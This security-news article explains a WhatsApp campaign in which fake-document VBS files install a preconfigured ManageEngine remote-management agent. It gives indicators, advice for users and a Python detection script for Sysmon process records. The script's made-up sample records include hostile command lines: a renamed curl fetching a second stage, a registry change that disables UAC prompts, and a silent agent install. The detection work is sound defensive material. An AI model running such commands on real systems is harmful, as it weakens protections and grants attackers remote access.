WhatsApp VBS Malware: Fake Documents Install Remote Access Tool

An active WhatsApp malware campaign is sending fake business-document VBS files to Windows users and installing a preconfigured remote management agent for attacker access.

A WhatsApp malware campaign is using fake business and finance documents to push malicious VBScript files to Windows users. Kaspersky said on June 22, 2026, that the campaign was still active and had affected users in multiple countries, with the largest share of observed infections in Malaysia.[1]

The lure is simple because it abuses trust. Victims receive a file from a known WhatsApp contact, often with no message text, and the attachment name looks like an invoice, bank statement, debt notice, payment list, tax form, or account statement. Kaspersky examples include Financial Reports.vbs, Debt confirmation.vbs, Account Statement.vbs, and localized names such as Sila semak bil anda.vbs.[1]

The practical risk is limited mainly to Windows systems using WhatsApp Desktop or WhatsApp Web. MyCERT separately warned that VBS attachments do not execute on iOS, Android, macOS, or Linux, and that mobile WhatsApp apps do not process these files as Windows executables.[2] That scope matters: if the file was only viewed on a phone, the risk is different from a Windows desktop where the user opened the attachment.

What the WhatsApp VBS malware does after the file opens

When the attachment is opened on Windows, it runs through Windows Script Host as WScript.exe. Kaspersky observed WhatsApp Desktop spawning the script from the app’s local attachment storage, while WhatsApp Web requires the downloaded file to be opened from the browser or Downloads folder.[1]

The first-stage script creates a working folder under C:\Users\Public\Documents, often with names such as Temp_<random> or MSUpdate_<random>. It then downloads two more VBScript payloads. Some variants hide the files and use renamed Windows utilities, including copies of curl.exe and bitsadmin.exe, to make the download activity look less obvious.[1]

The second stage attempts to weaken Windows User Account Control by targeting HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin. It also downloads a ZIP archive, extracts it quietly, removes warning metadata in some variants, and launches another script to install a remote management package.[1]

The final payload is not a custom spyware binary. It is a preconfigured ManageEngine Endpoint Central agent, a legitimate remote monitoring and management tool that attackers abuse for persistent access. The package includes files such as DCAgentServerInfo.json, setup1.vbs, UEMSAgent.msi, and UEMSAgent.mst. Once installed silently with msiexec.exe, the agent can connect the victim computer to attacker-controlled management servers.[1]

Kaspersky listed several related management server IP addresses, including 202.61.160[.]208, 202.61.160[.]202, 202.61.160[.]201, 202.61.160[.]160, 202.61.160[.]137, and 38.55.151[.]63. It also noted infrastructure overlap with earlier ValleyRAT and Gh0st RAT activity, but assessed that the evidence was not enough for confident attribution.[1]

For home users and small offices, the immediate advice is direct: do not open .vbs, .vbe, .exe, .bat, .cmd, .js, or .ps1 files sent over WhatsApp, even from known contacts, until the sender confirms through a second channel. If the file was opened on Windows, disconnect the machine from the internet, change important passwords from a clean device, and treat banking, email, and WhatsApp two-factor codes entered on that machine as exposed.[2]

For defenders, the useful checks are process- and file-based. Look for wscript.exe launched by WhatsApp Desktop or a browser, suspicious VBS files in WhatsApp transfer folders or Downloads, hidden working directories under C:\Users\Public\Documents, renamed copies of curl.exe or bitsadmin.exe, unexpected msiexec.exe installation of Endpoint Central, and outbound traffic to the listed UEMS infrastructure. Microsoft documented similar WhatsApp-delivered VBS/MSI tradecraft earlier in 2026 and recommended blocking obfuscated scripts, monitoring renamed Windows utilities, and using endpoint rules that stop VBScript from launching downloaded executable content.[3]
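As an added example (not from Kaspersky, MyCERT or Microsoft), the process and file checks above expressed as rules over constructed Sysmon-style process-creation records. The field names follow Sysmon Event ID 1; every path, user name, folder suffix and URL in the sample records is made up for the example.

```python
import re

# Constructed Sysmon-style (Event ID 1) process records. Field names follow Sysmon,
# but all paths, users, random suffixes and the URL below are invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\WhatsApp\WhatsApp.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\Financial Reports.vbs"'},
    {"Image": r"C:\Users\Public\Documents\Temp_8f21\svchost.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"svchost.exe -s -o stage2.vbs http://example.invalid/stage2"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\Public\Documents\MSUpdate_3c\UEMSAgent.msi "
                    r"TRANSFORMS=UEMSAgent.mst /qn"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CHAT_OR_BROWSER_PARENTS = {"whatsapp.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}
# Staging folders the article describes: Temp_<random> / MSUpdate_<random> under Public Documents.
STAGING_DIR = re.compile(r"c:\\users\\public\\documents\\(temp|msupdate)_", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of every campaign indicator a single process record matches."""
    hits = []
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    orig = ev.get("OriginalFileName", "").lower()      # PE version-info name, survives renaming
    if image in SCRIPT_HOSTS and parent in CHAT_OR_BROWSER_PARENTS and ".vbs" in cmd.lower():
        hits.append("script_host_from_whatsapp_or_browser")
    if orig in DOWNLOADERS and image != orig:           # curl/bitsadmin running under another name
        hits.append("renamed_download_utility")
    if STAGING_DIR.search(ev["Image"]) or STAGING_DIR.search(cmd):
        hits.append("public_documents_staging_dir")
    if "consentpromptbehavioradmin" in cmd.lower():     # UAC prompt policy being changed
        hits.append("uac_prompt_tampering")
    if image == "msiexec.exe" and "uemsagent.msi" in cmd.lower():
        hits.append("silent_endpoint_central_install")
    return hits

def scan(events):
    """Map the index of each flagged record to its indicators; clean records are omitted."""
    flagged = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            flagged[i] = hits
    return flagged
```

Run against real Sysmon exports by mapping the event XML fields into the same dictionary shape; the renamed-utility rule depends on OriginalFileName being logged, so confirm your Sysmon version populates it.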

This campaign also fits a broader pattern: attackers are moving malware through trusted messaging and business workflows rather than obvious email attachments. HowToFix readers who handle incident cleanup may also want to review our coverage of AiTM phishing that steals sessions, AnyDesk-style remote access abuse, and RAT infections that give attackers remote control.

References

  1. Kaspersky Securelist, “A VBScript campaign distributed through WhatsApp deploying RMM software,” June 22, 2026.
  2. MyCERT, “MA-1459.062026: Phishing Campaign Delivering VBS Malware via WhatsApp Desktop,” June 20, 2026.
  3. Microsoft Security Blog, “WhatsApp malware campaign delivers VBScript and MSI backdoors,” March 31, 2026.
  4. BleepingComputer, “WhatsApp phishing attack uses fake business docs to hack PCs,” June 22, 2026.

About the author

Emma Davis

Content editor and security writer focused on making malware-removal and scam-prevention guides easier to understand. Emma reviews structure, clarity, and source consistency before articles are published.
